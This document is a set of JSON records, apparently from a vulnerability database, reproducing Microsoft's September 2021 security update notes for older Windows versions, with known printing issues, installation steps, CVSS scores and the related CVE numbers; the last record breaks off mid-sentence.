{"lastseen": "2023-05-19T10:52:30", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006732](<https://support.microsoft.com/help/5006732>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007245](<https://support.microsoft.com/help/5007245>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006732](<https://support.microsoft.com/help/5006732>). If after installing [KB5006732](<https://support.microsoft.com/help/5006732>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005607>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005607](<https://download.microsoft.com/download/7/9/4/7944449d-0157-49a0-85ae-be5be2970e5a/5005607.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005607 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005607", "href": "https://support.microsoft.com/en-us/help/5005607", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005076](<https://support.microsoft.com/help/5005076>) (released August 10, 2021) and addresses the following issues:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006714](<https://support.microsoft.com/help/5006714>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007247](<https://support.microsoft.com/help/5007247>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006714](<https://support.microsoft.com/help/5006714>). If after installing [KB5006714](<https://support.microsoft.com/help/5006714>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005613>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005613](<https://download.microsoft.com/download/f/5/d/f5d43c2c-eb5e-48d1-961f-367730a68333/5005613.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005613 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005613", "href": "https://support.microsoft.com/en-us/help/5005613", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:35", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005088](<https://support.microsoft.com/help/5005088>) (released August 10, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006743](<https://support.microsoft.com/help/5006743>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007236](<https://support.microsoft.com/help/5007236>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006743](<https://support.microsoft.com/help/5006743>). If after installing [KB5006743](<https://support.microsoft.com/help/5006743>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005633>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005633](<https://download.microsoft.com/download/4/7/d/47d2fcaf-120b-46c1-8097-ecef0fae961f/5005633.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005633 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005633", "href": "https://support.microsoft.com/en-us/help/5005633", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006729](<https://support.microsoft.com/help/5006729>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007255](<https://support.microsoft.com/help/5007255>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006729](<https://support.microsoft.com/help/5006729>). If after installing [KB5006729](<https://support.microsoft.com/help/5006729>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005627>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005627](<https://download.microsoft.com/download/6/3/a/63a7a18b-4013-4336-b8a9-b78228da6198/5005627.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005627 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005627", "href": "https://support.microsoft.com/en-us/help/5005627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005099](<https://support.microsoft.com/help/5005099>) (released August 10, 2021) and addresses the following issues:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006739](<https://support.microsoft.com/help/5006739>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home 